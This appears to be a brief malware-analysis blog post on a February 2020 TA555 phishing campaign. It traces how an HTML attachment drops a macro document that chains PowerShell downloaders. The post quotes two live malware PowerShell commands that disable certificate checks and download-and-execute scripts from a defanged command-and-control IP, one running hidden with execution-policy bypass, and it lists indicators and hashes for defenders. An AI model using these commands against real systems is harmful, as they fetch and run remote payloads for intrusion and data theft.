Tuesday, February 4, 2020

TA555 Campaign Feb 2020

Found the new TA555 campaign spreads via email campaign, As analysed the file , I found lots of code similarities and behaviours which referred here hxxps://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot.

I am still doing my analysis, this will be a quick note for the defenders to fix their part.
MD5: a2d689af80054f2e81c297afd5f933b6
Filename: cv.html
Execution Flow: 
cv.html -> drops embedded cvxxx.doc 

-> Macro runs PowerShell 
-> PowerShell waits for 284 seconds and downloads additional PowerShell script via PNG extension.

powershell.exe -nop Start-Sleep 284;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object System.Net.WebClient).DownloadString('hxxps://194.36[.]188[.]132/'+(-join ((97..122) | Get-Random -Count 7 | % {[char]$_}))+'.png')

xxxxxx.PNG -> Second PS script

Downloads another PowerShell script via JPG extension.

$P59N3q7L5="-w 1 -sta -nop -noexit -ep bypass -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={`$true};iex (New-Object System.Net.WebClient).DownloadString('hxxps://194.36[.]188[.]132/'+(-join ((97..122) | Get-Random -Count 9 | % {[char]`$_}))+'.jpg')";if($env:PROCESSOR_ARCHITEW6432 -eq "AMD64"){$cEaleMo="$env:WINDIR\sysnative";}else{$cEaleMo="$env:WINDIR\system32";};$cEaleMo+="\windowspowershell\v1.0\powershell.exe";Start-Process $cEaleMo -arg $P59N3q7L5 -windowstyle hidden;

xxxxxx.JPG -> Third PS script
Has two b64 encoded data.

1st decoded data – tools.dll, which is a PoshAdvisor.

2nd decoded data – PowerShell script which do system discovery and collects Microsoft Outlook profile details and sends to C2, in parallel it also checks which Antivirus product installed.

During the analysis, I haven’t found any final payload drops, The PowerShell script is actively beaconing to C2.

But I found some remnants in code that it drops a payload *.exe in TEMP folder.

IOC - 194.36[.]188[.]132:443
Main file – cv.html: a2d689af80054f2e81c297afd5f933b6
CVxxxx.doc: EAF039445CC11684AA41652CF5BAE53D
xxxxx.PNG: A0F6A71FA67F77D04F2B59243DB9B33C (PS script)
XXXX.JPG: 995B8930FF2650EFE4D4E8204E644601(PS script)
Tools.dll: A034C5DBB4442894E2808FF008265620 



Post a Comment